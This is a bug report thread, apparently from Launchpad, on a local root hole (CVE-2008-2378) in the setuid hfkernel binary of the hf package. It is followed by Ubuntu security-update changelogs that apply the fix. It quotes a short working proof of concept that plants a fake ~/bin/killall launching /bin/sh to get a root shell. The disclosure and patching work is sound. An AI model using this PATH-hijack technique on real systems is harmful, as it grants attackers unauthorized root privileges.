[CVE-2008-2378] - Untrusted search path vulnerability in hfkernel in hf 0.7.3 and 0.8 allows local users to gain privileges via a Trojan horse

Will post test case later this evening.

I can confirm this bug as tested in a chroot environment.

Below is an extract from the Debian bug and functioned the same. It relies on ~/bin being in the $PATH, which is the default .profile function if a ~/bin directory exists.

The hf package, Described by Debian as an amateur-radio protocol suite
 using a soundcard as a modem, is a program that eventually becomes
 setuid(0), and has a trivial security hole in it.

 By default the package installs "/usr/bin/hfkernel" as a typical binary,
 but when first started via the program "hf" the binary is changed to
 be setuid(root).

 This is demonstrated:

skx@gold:~$ hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. Be aware that this can be a security hole.
Please do as root "chmod 4755 /usr/bin/hfkernel".
or start this script again as root.

 If you do start the program as root the permissions are changed:

skx@gold:~$ sudo hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. But be aware that this can be a security hole.
I will do this now "chmod 4755 /usr/bin/hfkernel".
For you, root, I will start only hfkernel for test purposes.
...

  Now the program is setuid:

skx@gold:~$ ls -l /usr/bin/hfkernel
-rwsr-xr-x 1 root root 244120 2008-05-07 19:37 /usr/bin/hfkernel

  Creating ~/bin/killall is sufficient to gain root privileges.

skx@gold:~$ echo -e '#!/bin/sh\n/bin/sh' > ~bin/killall
skx@gold:~$ chmod 755 ~/bin/killall
skx@gold:~$ hfkernel -k
sh-3.2# id
uid=1000(skx) gid=1000(skx) euid=0(root)

Can whoever uploads this, please change the 1.1 to 0.1 in the version in the debdiffs. not sure what I was thinking...

Jaunty has this fixed. I've got the debdiffs edited and building in the security queue now. Thanks for the patches and the testing!

This bug was fixed in the package hf - 0.8-8ubuntu0.1

---------------
hf (0.8-8ubuntu0.1) intrepid-security; urgency=low

  * SECURITY UPDATE: Fix local root security hole that is caused by an
    insecure call to the system function, thanks Steve Kemp. (LP: #320082)
    - Patch from Debian applied inline.
    - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504182
    - CVE-2008-2378

 -- Stefan Lesicnik <email address hidden> Thu, 22 Jan 2009 17:44:08 +0200

This bug was fixed in the package hf - 0.8-4ubuntu0.1

---------------
hf (0.8-4ubuntu0.1) gutsy-security; urgency=low

  * SECURITY UPDATE: Fix local root security hole that is caused by an
    insecure call to the system function, thanks Steve Kemp. (LP: #320082)
    - Patch from Debian applied inline.
    - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504182
    - CVE-2008-2378

 -- Stefan Lesicnik <email address hidden> Thu, 22 Jan 2009 18:17:55 +0200

This bug was fixed in the package hf - 0.8-5ubuntu0.1

---------------
hf (0.8-5ubuntu0.1) hardy-security; urgency=low

  * SECURITY UPDATE: Fix local root security hole that is caused by an
    insecure call to the system function, thanks Steve Kemp. (LP: #320082)
    - Patch from Debian applied inline.
    - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504182
    - CVE-2008-2378

 -- Stefan Lesicnik <email address hidden> Thu, 22 Jan 2009 17:50:08 +0200

hf (0.7.3-2ubuntu0.1) dapper-security; urgency=low

  * SECURITY UPDATE: Fix local root security hole that is caused by an
    insecure call to the system function, thanks Steve Kemp. (LP: #320082)
    - Patch from Debian applied inline. (Modified for 0.7.3)
    - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504182
    - CVE-2008-2378

 -- Stefan Lesicnik <email address hidden> Thu, 22 Jan 2009 18:13:36 +0200